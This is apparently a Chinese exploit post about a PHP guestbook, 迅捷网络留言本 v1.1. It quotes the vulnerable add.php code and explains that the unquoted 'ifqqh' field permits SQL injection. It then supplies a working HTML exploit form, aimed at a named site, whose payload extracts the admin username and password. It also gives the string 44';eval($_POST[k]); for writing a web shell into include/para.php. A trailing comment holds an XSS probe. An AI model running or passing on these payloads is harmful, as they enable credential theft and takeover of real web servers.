By:毅心毅意

    下载地址:http://down.chinaz.com/soft/29982.htm

add.php:

<?php
                 if($_POST['unum']==$_SESSION["randValid"]){
                        $username=addslashes(htmlspecialchars($_POST['username']));
                        $email=addslashes(htmlspecialchars($_POST['email']));
                        $content=addslashes(htmlspecialchars($_POST['content']));
                        $userip=$_SERVER["REMOTE_ADDR"];
                        $ifqqh=$_POST["ifqqh"];
                        if(empty($ifqqh)) $ifqqh=0;
                        $systime=date("Y-m-d H:i:s");
                        if(!empty($content) or !empty($username)){
                        $ifshow="";
                        //还原空格和回车
                        if(!empty($content)){
                                $content=str_replace(" ","",$content);
                                $content=ereg_replace("\n","<br>  ",ereg_replace(" ","&nbsp;",$content));
                        }
                        if($ifauditing==1){$ifshow=0;}else{$ifshow=1;}
                        //还原结束
                        $sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";
                        //echo $sql;



$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
$sql="insert into ".TABLE_PREFIX."guestbook(username,email,content,userip,systime,ifshow,ifqqh)values('".$username."','".$email."','".$content."','".$userip."','".$systime."',".$ifshow.",".$ifqqh.")";$ifqqh没有用   '  来包含。不受magic_quotes_gpc影响

Exp:

<form name="form1" method="post" action="http://guestboo.ibook.bz/add.php" onSubmit="return FrontPage_Form1_Validator(this)">
<p><img src="images/i1.gif" /><img src="images/add.gif" /></p><br />
<label for="user">昵称:</label><input type="text" id="username" name="username" value="123312" />*<br />
<label for="email">Email:</label><input type="text" id="email" name="email" value="" /><br />
<label for="comment">内容:</label><textarea id=content name="content"></textarea>*<br />
<label for="comment"> </label><span>提交前请按Ctrl+C保存留言内容,以免程序出错而丢失!
留言内容不能少于5个字符!</span><br />
<input type="text" id="ifqqh" name="ifqqh" value="6666666),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0" /><br /
<label for="email">悄悄话:</label>
<input name="ifqqh" type="checkbox" id="ifqqh" value="1"> <span>当选中时,此留言只有管理员可见</span><br />
<label for="umum">验证码:</label><input name="unum" type="text" id="unum" size="10">* <img src="http://guestboo.ibook.bz/include/randnum.php?id=-1" title="点击刷新" style="cursor:pointer" onclick=eval('this.src="include/randnum.php?id='+i+++'"')>
<br />
<input type="submit" id="sbutton" value="确  定" /><br /><input name="ac" type="hidden" id="ac" value="add">
</form>
</div>

    进入后台

迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

admin_set.php:

// write the para file
$filenum = fopen ("include/para.php","w");
ftruncate($filenum, 0);
fwrite($filenum, $parafile);
fclose($filenum);
        echo "设置已保存,请稍候……<br><a href=".$pageUrl.">如果浏览器没有自动返回,请点击此处返回</a>";
        echo "<meta http-equiv=\"refresh\" content=\"2; url=".$pageUrl."\">";
?>

    可以写入:include/para.php,写入:44';eval($_POST[k]);,即可。

迅捷网络留言本(原多多留言本) v 1.1 GBK注入漏洞及后台拿WebShell

    因为用了 ' 包含,所以会受 magic_quotes_gpc 影响。

留言评论(旧系统):

佚名 @ 2013-03-28 20:00:36

a.jsp/scriptalert(Vulnerable)/script

本站回复:

╮(╯_╰)╭